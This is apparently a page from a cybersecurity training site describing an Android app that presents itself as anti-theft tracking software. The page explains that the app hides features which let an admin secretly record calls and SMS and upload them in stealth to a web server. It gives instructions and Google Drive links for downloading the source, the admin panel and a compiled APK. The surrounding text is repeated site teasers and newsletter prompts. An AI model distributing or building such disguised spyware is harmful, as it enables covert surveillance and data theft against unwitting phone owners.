The Ultimate Guide to Automation Testing
Have you heard about the term “test automation” but don’t really know what it is? Well, you’ve come to the right page! Get all your
This software consists of three parts: source for installing app on android device (in AndroidAntiTheft folder) webserver with all necessary scripts/files to control remote phone (in admin_panel folder) DB (in folder DB) additionally a older compiled apk file is attached a swell – ready to download and install on your device.
what it does
the application “acts” as an antitheft software. The moment you install it it helps you track your phone. with an IMEA code displayed after staring you can log into the webserver and see where your phone is. This is the non malicious part. The malicious part: the admin (hacker) in this security demo can also log into another part of the webserver and enable installed features within the app (hidden to the user). He can activate features like phone recording, sms recording etc. all enabled features result in an stealth upload of all data to the webserver, where the admin can take a closer look at the data.
You can download the source by clicking on “Source”. Then navigate to
“browse”. Then navigate to the correct tree (most times its trunk”. On
the right side you will find the files. If you wan’t to download e.g. an
already comiled exe you can click on the “exe” in the right window. It
will tell you that the file is too big to display. But on the left side
you can still see a link “view raw file”. Right mouse click on that and
“save as”. you will then be able to save the exe. In case you want to
only download the already compiled version (not source code included
please click on this link:
Source: https://drive.google.com/file/d/0Bxfib9ZpfZLaOGRVa1pFRnBVOVE/edit?usp=sharing Admin Panel: https://drive.google.com/file/d/0Bxfib9ZpfZLaQ2JBSXNnaG1STDA/edit?usp=sharing Old APK (compile new one!): https://drive.google.com/file/d/0Bxfib9ZpfZLaaFRkVVkxaWFvUEU/edit?usp=sharing
Industrial Cybersecurity
September 28, 2023
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings
Have you heard about the term “test automation” but don’t really know what it is? Well, you’ve come to the right page! Get all your
This article explores the idea of discovering the victim’s location. Previously, we have used several tools for OSINT purposes, so, today let us try this
Can random characters in your code get you in trouble? They certainly can! Today, we are going to discuss CRLF injections and improper neutralization of
Want always be up to date?
By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.
Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings